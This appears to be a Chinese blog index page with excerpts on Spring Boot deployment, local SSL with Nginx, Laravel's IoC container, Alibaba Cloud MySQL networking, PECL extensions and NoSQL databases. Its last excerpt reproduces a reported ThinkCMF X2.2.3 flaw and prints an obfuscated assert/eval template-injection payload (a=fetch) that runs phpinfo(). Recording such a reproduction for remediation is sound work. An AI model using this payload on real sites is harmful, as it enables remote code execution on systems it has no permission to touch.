准备工作
- 一个可以访问的服务器,已安装宝塔面板。
- Java开发环境(JDK)已安装在服务器上。
- Maven或Gradle等构建工具,用于打包 Spring Boot 项目,我这里用的是 Maven
- 集成开发环境,我这里使用的是IntelliJ IDEA。
项目打包
- 配置 pom.xml(针对 Maven):
因为我这边是通过阿里云云原生应用脚手架生成的 Spring Boot 项目,所以在 pom.xml
文件中包含了 Spring Boot 插件,示例如下:
小峰的博客
在开发和测试过程中,使用 HTTPS 进行本地开发可以模拟生产环境,确保应用程序在实际部署时的安全性。本文将介绍如何在 Windows 环境中生成本地 SSL 证书,并将其配置到 Nginx 服务器上,以便通过 HTTPS 访问本地服务器。
OpenSSL 是一个用于生成和管理 SSL/TLS 证书的工具。下载并安装 OpenSSL:
D:\Program Files\OpenSSL-Win64\bin
配置到环境变量。名词解释:
Laravel框架可能是PHP开发者最常用的框架之一,它的核心就是一个IoC容器,根据文档称其为服务容器,顾名思义该容器提供了整个框架中需要的一系列服务。作为初学者很多人会在这一个概念上犯难,因此我们可以从一些基础的内容开始讲解,通过理解面向对象开发中依赖的生产和解决方法,来逐步揭开“依赖注入”的面纱,逐渐理解这一神奇的设计理念。
在Web开发的世界里,网络攻击是一种常见且潜在的威胁。理解这些攻击如何运作并采取措施防范它们对于构建安全的Web应用至关重要。本文将介绍几种常见的Web攻击,提供防范策略,并以实例说明如何防止这些攻击。
我们以阿里云云服务器为例,实现相同地域两台服务器间内网链接MySQL数据库。
服务器A:内网IP:10.10.10.100,并搭建MySQL数据库。
服务器B:内网IP:10.10.10.101。
如果两台服务器网络是专有网络,则需要保证这两台服务器在同一个专有网络下,否则两台服务器无法互相访问,下面我们以在同一个专有网络为例。
先登录服务器B命令行执行ping命令,查看是否可以访问服务器A
1 | # ping 10.10.10.100 -c 3 |
如果访问失败,再次查看两台服务器网络环境是否一致。
登录阿里云平台,在服务器所在的安全组配置访问规则
PECL(PHP Extension Community Library)是 PHP 的扩展库,它提供了一些 PHP 扩展,可以增强 PHP 的功能。所有扩展包列表查询地址:https://pecl.php.net/package-stats.php
在PECL上找到所需要的PHP扩展,点击有DLL标识的链接地址,进行对应PHP版本的资源下载,但是你需要注意以下几点问题:
打开 php 配置文件 php.ini 添加以下配置:
Redis、Memcached和MongoDB是三种常用的NoSQL数据库,它们各自有着不同的特点和应用场景。
Redis
Redis是一种基于内存的数据结构存储系统,它支持多种数据结构,包括字符串(String)、哈希表(Dict)、列表(List)、集合(Set)、有序集合(sorted set)和基数估算(HyperLogLog)。
Redis的主要特点是速度快,支持高并发读写操作,并且可以持久化数据。
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻
网站是基于ThinkCMF框架搭建的,查看版本是X2.2.3
,根据网警提供的检测报告在postman工具上操作复现漏洞情况
content=<php>die(assert('ev'.'a'.'l("'.'e'.'va'.'l(bas'.'e64_de'.'code(\"cGhwaW5mbygpOw==\"));;return 1;")'))</php>
a=fetch
点击发送,看看结果,意不意外惊不惊喜!